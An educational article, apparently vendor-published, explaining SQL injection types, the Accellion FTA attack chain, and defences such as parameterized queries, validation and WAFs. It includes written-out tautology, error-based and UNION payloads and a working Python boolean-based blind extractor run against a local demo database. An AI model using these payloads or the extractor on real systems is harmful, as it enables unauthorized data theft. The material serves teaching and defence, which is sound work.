What is SQL Injection?
SQL injection (SQLi) is a well-known attack technique in which malicious SQL is supplied as input to an application that builds database queries by concatenating that input into the query text. Because the input is parsed as part of the statement, the attacker can manipulate the backend database and read data the application never intended to expose: sensitive company data, user lists, private customer details, and so on.
The consequences of SQL injection on a business are significant. A successful attack could lead to unauthorized access to user lists, deletion of entire tables, and, in some cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.
When calculating the potential cost of an SQLi attack, it is essential to consider the loss of customer trust if personal information such as phone numbers, addresses, and credit card details is compromised.
Although any application that builds SQL from untrusted input is exposed, whatever database engine sits behind it, web applications are the most common targets for such attacks.
What are SQL queries?
SQL is a standardized language for interacting with and managing relational databases. SQL queries perform tasks such as retrieving data, updating records, and deleting records; for example, a query uses the SELECT statement to retrieve the rows that match parameters supplied by the user.
Consider an example query from a typical online bookstore's SQL database, where the value after the equals sign is a placeholder for the ISBN supplied by the user:
SELECT BookTitle, Author FROM Books WHERE ISBN = ISBN
Here, the web application constructs a dynamic query string sent to the database as a single SQL statement:
sql_query = " SELECT BookTitle, Author FROM Books WHERE ISBN = " & Request.QueryString("ISBN")
Now, imagine a user provides input via a URL like http://www.bookstore.com/books/details.asp?isbn=123456. This input generates the following SQL query:
SELECT BookTitle, Author FROM Books WHERE ISBN = 123456
As illustrated by the syntax, this query retrieves the title and author of the book with ISBN 123456.
Types of SQL Injections
SQL injections are generally categorized into three types: in-band SQLi (classic), inferential SQLi (blind), and out-of-band SQLi. The classification reflects how the attacker retrieves results: directly in the application's response, by inference from the application's behavior, or over a separate network channel. All three can do the same damage; what differs is the effort needed to extract data.
In-band SQLi
The attacker uses the same communication channel both to launch the attack and to collect its results, typically the HTTP response. In-band SQLi is the most prevalent type and, because results arrive directly, the simplest to exploit. It has two sub-variations:
- Error-based SQLi: The attacker crafts input that makes the database raise an error, and the application echoes the error message back in its response. Database error messages often reveal table and column names, the database version, or even the value that caused the error. This only works when the application returns verbose database errors to the client, which is itself a misconfiguration worth fixing.
- Union-based SQLi: The attacker appends a UNION SELECT to the original query. The UNION operator combines the result sets of two SELECT statements into one, so rows from a table the attacker chooses are returned in the same HTTP response as the legitimate results. The injected SELECT must return the same number of columns, with compatible types, as the original query.
Inferential (Blind) SQLi
The attacker sends data payloads to the server and observes its responses and behavior to infer information about the database. It is called blind SQLi because no data from the database is returned directly in the response; the attacker cannot see the results of the attack in-band.
Blind SQL injection relies on analyzing response and behavior patterns, so it is slower to execute, often taking dozens of requests per extracted character, but it can be just as damaging. It is categorized as follows:
- Boolean-based: The attacker injects a condition into the query and watches whether the application's response changes. If the condition is true the page renders as normal; if it is false the content differs (for example, the record is reported as not found). By asking a series of such yes/no questions, the attacker reconstructs data one bit or one character at a time.
- Time-based: The attacker injects a condition that, when true, makes the database pause for a chosen number of seconds (for example SLEEP() on MySQL, WAITFOR DELAY on SQL Server, or pg_sleep() on PostgreSQL) before responding. Whether the HTTP response arrives immediately or only after the delay tells the attacker whether the condition was true, again without any data from the database appearing in the response.
Out-of-band SQLi
This type of attack is only possible when particular features are enabled on the database server: it relies on the server being able to make outbound network requests, typically DNS lookups or HTTP requests to a host the attacker controls. It serves as an alternative to in-band and inferential techniques.
Out-of-band SQL injection is used when the attacker cannot use the same channel to both launch the attack and retrieve its results, or when the server is too slow or unstable for blind inference to be practical. The injected query makes the database server send the data it has retrieved (for example, encoded in the subdomain of a DNS lookup) to an endpoint the attacker monitors.
SQL injection example
To illustrate SQL injection, consider the online bookstore's website from above. The attacker exploits the site's lack of input handling to change the structure of its query. In the examples below the application wraps the isbn parameter in single quotes before concatenating it; with the unquoted concatenation shown earlier, no quote character is needed in the payload at all. Here are a few methods they might employ:
1. Boolean-based SQLi (tautology):
The attacker appends an always-true condition so that the WHERE clause matches every row, retrieving all book titles and authors from the database:
Input URL: http://www.bookstore.com/books/details.asp?isbn=123456' OR '1'='1
Resulting SQL query:
SELECT BookTitle, Author FROM Books WHERE ISBN = '123456' OR '1'='1'
The single quote after 123456 closes the string literal, and the application's own closing quote completes '1'='1'. The same trick with a condition the attacker controls, true or false, is the building block of the blind boolean-based attacks described above.
2. Error-based SQLi:
The attacker forces a type-conversion error whose message echoes a value read from the database. The example below uses SQL Server syntax (convert, top, information_schema):
Input URL: http://www.bookstore.com/books/details.asp?isbn=123456' AND 1=convert(int, (select top 1 column_name from information_schema.columns))--
Resulting SQL query:
SELECT BookTitle, Author FROM Books WHERE ISBN = '123456' AND 1=convert(int, (select top 1 column_name from information_schema.columns))--'
The trailing -- comments out the quote the application appends. The column name cannot be converted to an integer, so SQL Server raises a conversion error whose message includes the offending value, the column name; if the application shows that error to the client, the attacker reads the database structure from it one value at a time.
3. UNION-based SQLi:
The attacker appends a UNION SELECT that returns the same number of columns as the original query (two, matching BookTitle and Author) from the Users table, so credentials are listed alongside book details:
Input URL: http://www.bookstore.com/books/details.asp?isbn=123456' UNION SELECT username, password FROM Users--
Resulting SQL query:
SELECT BookTitle, Author FROM Books WHERE ISBN = '123456' UNION SELECT username, password FROM Users--'
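The following is an added, runnable example that is not part of the original article; it reproduces the bookstore scenario in Python against an in-memory SQLite database with constructed sample rows (the Books and Users tables, their columns and their contents are assumed for the demo). It shows the tautology and UNION payloads above returning data through the vulnerable concatenated query, and, for the blind SQLi section earlier, a boolean-based extractor that recovers the admin password from a table that is never displayed, using only "did the book page render or not" as its signal. The SQL Server-specific error-based payload is not reproduced because SQLite does not raise a conversion error for it. A time-based variant would replace the oracle's row check with a response-time check and a delay function the target database supports.

```python
import sqlite3


def build_bookstore_db() -> sqlite3.Connection:
    """Constructed sample data (not real) standing in for the bookstore's
    database: Books is what the page shows, Users is what it never should."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Books (ISBN TEXT, BookTitle TEXT, Author TEXT);
        CREATE TABLE Users (username TEXT, password TEXT);
        INSERT INTO Books VALUES ('123456', 'Secure Coding', 'A. Author');
        INSERT INTO Books VALUES ('654321', 'Threat Modeling', 'B. Writer');
        INSERT INTO Users VALUES ('admin', 'S3cret!');
        INSERT INTO Users VALUES ('alice', 'hunter2');
    """)
    return conn


def lookup_book_vulnerable(conn: sqlite3.Connection, isbn: str) -> list:
    """Deliberately vulnerable: the article's concatenation, with the value
    wrapped in single quotes. A quote in the input ends the string literal and
    everything after it is parsed as SQL."""
    sql = "SELECT BookTitle, Author FROM Books WHERE ISBN = '" + isbn + "'"
    return conn.execute(sql).fetchall()


# In-band payloads from the article, as they arrive in the isbn parameter.
# The trailing -- comments out the closing quote the application appends.
TAUTOLOGY = "123456' OR '1'='1"
UNION_LEAK = "123456' UNION SELECT username, password FROM Users--"


class BlindExtractor:
    """Boolean-based blind extraction: the attacker never sees Users in a
    response, only whether the book page for a known ISBN still renders."""

    def __init__(self, conn: sqlite3.Connection):
        self.conn = conn
        self.requests = 0  # how many HTTP requests the attack would take

    def oracle(self, condition: str) -> bool:
        """True iff the injected condition is true (the known row still matches)."""
        self.requests += 1
        payload = f"123456' AND ({condition})--"
        return len(lookup_book_vulnerable(self.conn, payload)) > 0

    def _search(self, lo: int, hi: int, greater_than: str) -> int:
        """Binary search for the integer v in [lo, hi] for which
        oracle(greater_than.format(mid)) is true exactly when v > mid."""
        while lo < hi:
            mid = (lo + hi) // 2
            if self.oracle(greater_than.format(mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract(self, subquery: str, max_len: int = 64) -> str:
        """Recover the string a scalar subquery returns, one character at a
        time, from yes/no answers alone (assumes printable ASCII)."""
        length = self._search(0, max_len, f"(SELECT length(({subquery}))) > {{}}")
        chars = []
        for pos in range(1, length + 1):
            probe = f"(SELECT unicode(substr(({subquery}), {pos}, 1))) > {{}}"
            chars.append(chr(self._search(32, 127, probe)))
        return "".join(chars)


if __name__ == "__main__":
    conn = build_bookstore_db()
    print("normal:   ", lookup_book_vulnerable(conn, "123456"))
    print("tautology:", lookup_book_vulnerable(conn, TAUTOLOGY))   # every book
    print("union:    ", lookup_book_vulnerable(conn, UNION_LEAK))  # books plus credentials
    ext = BlindExtractor(conn)
    secret = ext.extract("SELECT password FROM Users WHERE username = 'admin'")
    print(f"blind:     {secret!r} recovered in {ext.requests} requests")
```

The request counter is the practical point of the blind part: every character costs about seven requests (a binary search over printable ASCII), which is why blind attacks are slow and noisy in web logs, and why a WAF or rate limit that sees one request at a time still has a pattern to catch.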
SQL injection combined with OS Command Execution: The Accellion Attack
Accellion's File Transfer Appliance (FTA) was a network appliance widely used by organizations worldwide to transfer large, sensitive files; after more than 20 years in service it has reached the end of its life cycle.
In late 2020 and early 2021, FTA became the target of a distinctive and sophisticated attack that chained SQL injection with operating system command execution. Experts believe that the perpetrators behind the Accellion attack may have affiliations with the financial crimes group FIN11 and the Clop ransomware group.
This incident underscores that SQL injection isn’t solely limited to attacking web applications or services but can also be employed to compromise backend systems and illicitly extract data.
Accellion attack flow
According to the report Accellion commissioned from Mandiant, the SQL injection and command execution attack unfolded as follows:
- The attackers exploited a SQL injection vulnerability in document_root.html to retrieve encryption keys from the Accellion FTA database.
- With those keys they generated valid tokens that granted access to additional files.
- Using those tokens, they exploited an operating system command execution vulnerability in sftp_account_edit.php to run commands of their own on the appliance.
- They wrote a web shell to /home/seos/courier/oauth.api on the server.
- Through this web shell they uploaded DEWMODE, a custom, full-featured web shell built specifically to exfiltrate data from the FTA system.
- DEWMODE queried the FTA's MySQL database for the list of stored files and rendered them, with their metadata, as an HTML page.
- The attackers then issued file download requests, with encrypted and encoded URL parameters, to the DEWMODE component.
- DEWMODE served the files and removed the corresponding entries from the FTA web logs to hide the activity.
This incident highlights the severity of SQL injection attacks by demonstrating how they can serve as a gateway for more damaging assaults on critical corporate infrastructure.
SQLI prevention and mitigation
To prevent SQL injection (SQLI) attacks and mitigate their impact, several effective measures can be implemented.
The root cause is building SQL statements by concatenating untrusted input, so the primary fix is to stop doing that: use parameterized queries (prepared statements), or a query builder or ORM that binds values separately from the statement text, so that input is always treated as data and never parsed as SQL. Input validation (and its cousin sanitization, which rewrites input rather than rejecting it) adds a second layer. It consists of coding practices that identify and reject illegitimate input, ideally by allowlisting the formats a field may take; an ISBN, for instance, is digits only. Validation is a best practice but not a complete defense: blocklists of dangerous characters are easy to bypass, and mapping every legal and illegal input for free-text fields is hard and tends to produce false positives that disrupt users and application functionality.
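As an added example (not code from the original article), the three approaches side by side in Python against an in-memory SQLite database with constructed sample rows: a blocklist that strips quotes but still concatenates, the parameterized query that fixes the problem, and an allowlist check layered on top of it. The Books table, its columns and the assumption that ISBNs are stored as plain digit strings are all assumptions of the demo.

```python
import re
import sqlite3


def build_books_db() -> sqlite3.Connection:
    """Constructed sample data (not real), enough to show each lookup's behaviour."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Books (ISBN TEXT, BookTitle TEXT, Author TEXT);
        INSERT INTO Books VALUES ('123456', 'Secure Coding', 'A. Author');
        INSERT INTO Books VALUES ('654321', 'Threat Modeling', 'B. Writer');
    """)
    return conn


def lookup_blocklist(conn: sqlite3.Connection, isbn: str) -> list:
    """Still vulnerable: strips quotes (a typical blocklist) but concatenates the
    value unquoted, as the article's ASP snippet does. A numeric context needs
    no quote at all, so '123456 OR 1=1' sails straight through."""
    cleaned = isbn.replace("'", "")
    sql = "SELECT BookTitle, Author FROM Books WHERE ISBN = " + cleaned
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, isbn: str) -> list:
    """The real fix: the SQL text is fixed and the value is bound separately, so
    it is compared as data and can never change the statement's structure."""
    return conn.execute(
        "SELECT BookTitle, Author FROM Books WHERE ISBN = ?", (isbn,)
    ).fetchall()


# Assumed format for this demo: ISBNs are stored as 6 to 13 plain digits.
ISBN_RE = re.compile(r"\d{6,13}")


def lookup_validated(conn: sqlite3.Connection, isbn: str) -> list:
    """Defence in depth: an allowlist rejects anything that is not an ISBN before
    the (still parameterized) query runs, giving a clear error instead of a
    silently empty result."""
    if not ISBN_RE.fullmatch(isbn):
        raise ValueError("rejected: ISBN must be 6 to 13 digits")
    return lookup_parameterized(conn, isbn)


if __name__ == "__main__":
    conn = build_books_db()
    print(lookup_blocklist(conn, "123456 OR 1=1"))          # both books: blocklist bypassed
    print(lookup_parameterized(conn, "123456' OR '1'='1"))  # []: the payload is just a literal
    print(lookup_parameterized(conn, "123456"))             # the one real row
    try:
        lookup_validated(conn, "123456' OR '1'='1")
    except ValueError as err:
        print(err)
```

Note the order of defenses: parameterization alone already neutralizes the payload (it is looked up as a literal ISBN and matches nothing); validation on top of it turns that silent miss into an explicit rejection that can be logged and alerted on. Validation instead of parameterization is the trap the blocklist function illustrates.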
Therefore, many organizations employ a web application firewall (WAF) to bolster their defenses against SQLI and other online threats. A WAF utilizes a vast and continuously updated database of meticulously crafted signatures to identify and block malicious SQL queries. These signatures target specific attack vectors and are regularly updated to address newly discovered vulnerabilities.
Furthermore, modern WAFs are often integrated with other security solutions to enhance their effectiveness. For instance, a WAF may cross-verify suspicious inputs with IP data to make informed blocking decisions. It may block an input only if the associated IP has a history of malicious activity.
Imperva's cloud-based WAF employs signature recognition, IP reputation analysis, and other security methodologies to detect and prevent SQL injections with minimal false positives. Additionally, it utilizes IncapRules, a custom security rule engine that enables precise customization of default security settings and the creation of tailored security policies to address specific cases.
FAQs
What is SQL injection (SQLI), and how does it work?
SQL injection, commonly referred to as SQLi, is an attack method in which malicious SQL code is used to manipulate backend databases and gain unauthorized access to sensitive information. Attackers exploit web applications that build SQL statements by concatenating user input into the query text; the input is then parsed as SQL, enabling them to retrieve, modify, or delete data in the database.
What are the consequences of SQL injection attacks?
SQL injection attacks can have severe consequences for businesses, including unauthorized access to sensitive data such as user lists and private customer details, deletion of entire database tables, and in some cases, the attacker gaining administrative control over the database.
How can businesses prevent SQL injection attacks?
The most reliable prevention is to use parameterized queries (prepared statements), so that user input is bound as data rather than concatenated into SQL text. Input validation adds a second layer: filtering and validating user inputs, preferably against an allowlist of expected formats, so that unexpected values are rejected before they reach the database. Additionally, businesses can deploy web application firewalls (WAFs) to filter out malicious SQL queries and other online threats. Modern WAFs use a combination of signature recognition, IP reputation analysis, and other security methodologies to detect and prevent SQL injection attacks with minimal false positives.
Are SQL injection attacks limited to web applications only?
No. Any code that builds SQL from untrusted input is exposed, not just public websites: internal tools, APIs, and appliances such as the Accellion FTA have all been compromised this way. The flaw lives in the application's query construction rather than in the database management system itself, and once exploited it can be chained with other weaknesses to compromise backend systems and exfiltrate data.
What are some common types of SQL injection attacks?
SQL injection attacks can be categorized into three main types: In-band SQLi (Classic), Inferential SQLi (Blind), and Out-of-band SQLi. Each type employs different techniques to access backend data and can cause varying degrees of damage.
How does the Accellion attack demonstrate the severity of SQL injection attacks?
The Accellion attack combined SQL injection with operating system command execution, highlighting the potential for SQL injection attacks to compromise critical corporate infrastructure. This incident underscores the importance of implementing robust security measures to prevent and mitigate SQL injection attacks.
What steps can businesses take to mitigate the impact of SQL injection attacks?
In addition to input validation and deploying web application firewalls, businesses can implement regular security updates and patches, conduct security audits and penetration testing, and educate employees about the risks of SQL injection attacks and best practices for prevention.
How does Imperva’s cloud-based WAF prevent SQL injection attacks with minimal false positives?
Imperva’s cloud-based WAF employs signature recognition, IP reputation analysis, and other security methodologies to detect and prevent SQL injections. Additionally, it utilizes IncapRules, a custom security rule engine that enables precise customization of default security settings and the creation of tailored security policies to address specific cases, thus minimizing false positives and enhancing overall security posture.
Conclusion
SQL injection (SQLi) attacks pose serious threats to businesses, exploiting applications that build database queries from untrusted input. To combat these risks, organizations must build queries with parameterized statements, validate input against allowlists, and deploy web application firewalls (WAFs) as an additional layer. These defenses, alongside regular updates, audits, and employee education, form a comprehensive strategy to mitigate the impact of SQL injection attacks and protect critical infrastructure and sensitive data.